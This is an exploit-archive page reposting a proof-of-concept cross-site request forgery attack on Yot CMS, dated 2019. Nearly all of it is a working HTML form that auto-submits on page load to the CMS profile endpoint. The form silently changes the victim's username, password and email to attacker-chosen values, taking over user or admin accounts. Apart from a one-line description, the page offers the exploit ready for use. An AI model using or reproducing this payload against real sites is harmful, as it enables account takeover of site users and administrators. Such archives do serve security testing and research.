Advertisement






YOT CMS Cross-Site Request Forgery - user profile changing

CVE Category Price Severity
N/A CWE-352 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2019-02-11
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019020105

Below is a copy:

YOT CMS Cross-Site Request Forgery - user profile changing
# Product : Yot CMS webapp
# Author : M - NullByteStream Team
# vendor homepage : https://sourceforge.net/projects/yot/
# Date : 10/2/2019
# Dork : N/A

##############################################################

This CSRF vulnerability allows attacker to change user/admin account details ( username , password .... )

Exploit :

<html>
<body onload='document.forms[0].submit()'>
<form action="http://site.com/index.php?page=user&op=do_profil" method="POST" name="user_form" enctype="multipart/form-data" OnSubmit='return user_form_verifchamps();'>
<table name="user_form" class="tabform" cellpadding="1" align="center"  ><tr><td valign="top"><label>Pseudo</label> :</td><td valign="top"><input type="text" name="user" value="newusername" size="30" /> * </td></tr><tr><td valign="top"><label>Prnom</label> :</td><td valign="top"><input type="text" name="firstname" value="armando" size="30" /></td></tr><tr><td valign="top"><label>Nom</label> :</td><td valign="top"><input type="text" name="name" value="syria" size="30" /></td></tr><tr><td valign="top"><label>Mot de passe</label> :</td><td valign="top"><input type="password" name="pass1" value="newpassword" size="30" /></td></tr><tr><td valign="top"><label>Retaper mot de passe</label> :</td><td valign="top"><input type="password" name="pass2" value="newpassword" size="30" /></td></tr><tr><td valign="top"><label>Email</label> :</td><td valign="top"><input type="text" name="mail" value="[email protected]" size="30" /> * </td></tr><tr><td valign="top"><label>URL Avatar</label> :</td><td valign="top"><input type="text" name="avatar" value="" size="30" /></td></tr><tr><td valign="top"><label>Tlcharger un avatar</label> :</td><td valign="top"><input type="file" name="upload_avatar" /></td></tr><tr><td valign="top"><label>Thme</label> :</td><td valign="top"><select name="theme"><option value="" selected></option><option value="coolbad" >coolbad</option><option value="coolbad_jaune" >coolbad_jaune</option><option value="yot3" >yot3</option></select></td></tr><tr><td valign="top"><label>Prvenir par email d'une nouvelle news</label> :</td><td valign="top"><input type="radio"  name="mailnews" value="1"  />Oui&nbsp;&nbsp;<input type="radio"  name="mailnews" value="0" checked />Non&nbsp;&nbsp;</td></tr></table>

<div align="center">(*) Champs obligatoires<br/><br/><input type="submit" value="Modifier"/></div>
</form>




###############################################################

NBS Team

http;//nullbytestream.tk

###############################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum